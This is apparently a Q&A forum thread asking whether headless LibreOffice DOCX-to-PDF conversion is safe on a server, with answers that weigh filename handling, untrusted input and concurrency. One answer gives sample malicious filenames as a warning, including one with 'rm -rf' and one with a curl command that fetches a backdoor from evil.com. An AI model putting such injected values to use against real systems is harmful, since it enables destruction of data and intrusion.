Reputation: 2517
I have my-template.docx
that I convert into my-report.docx
with OpenXml and then my-report.pdf
with:
soffice --headless --convert-to pdf my-report.docx
I feel compelled to say that this functionality is very much appreciated 🙌. Anyways, one thing I can't find an answer to here (cli documentation) or here (comparison with MS Office) or my other post is if LibreOffice is safe for automation.
See this post from Microsoft that says not to use Word for server-side automation. That begs the question of whether LibreOffice is safe for server side automation? Basically I will be using C# to run soffice --headless --convert-to pdf my-report.docx
anytime a request for a report comes in.
Is that safe?
*assume nobody else is trying to read my-report.docx
Upvotes: 12
Views: 15574
Reputation: 57418
I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:
soffice --headless --convert-to pdf my-report.docx
What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):
Possible but unlikely "exploit" avenues that might remain:
Content-Disposition: attachment; filename="thatswhatshesaid";
, not using the user's filename on your filesystem and risking saving data to byebye.pdf && rm -rf ...
(or irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php
or...), sending back a Location: downloads/whatshesaid.pdf
.Upvotes: 5
Reputation: 6581
Moggi's answer is a great one. The only things I can add are:
I hope that helps.
Upvotes: 3
Reputation: 1486
As long as you control the content of the input file there should be no issue at all. Keep in mind that LibreOffice only allows one active instance per user profile, so if you want to be able to process more than one document in parallel you should use separate user profiles.
If you have untrusted input data the whole question becomes more complex to answer. While there has been quite a bit of work securing the code base, a desktop office suite is still a huge piece of software with a lot of potential attack surfaces (macros, remote data connections, old binary file formats, ...). While all of these features should be blocked in headless operations you have to trust that there are no undiscovered bugs.
The remaining points in the Microsoft article should not apply to LibreOffice. The headless mode is designed not to interact with the desktop environment and except for the user profile does not change anything in the system or depends on any desktop related piece. The default builds will still depend on some GUI libraries but if that actually becomes a problem there is an experimental build option to build a non-GUI version without any X/GTK/KDE library dependencies.
As an alternative there are also a few projects built on top of LibreOffice that try to make converting documents even easier and might actually be faster by pre-forking or using the LibreOfficeKit API. Two examples are JODConverter or unoconv.
Upvotes: 17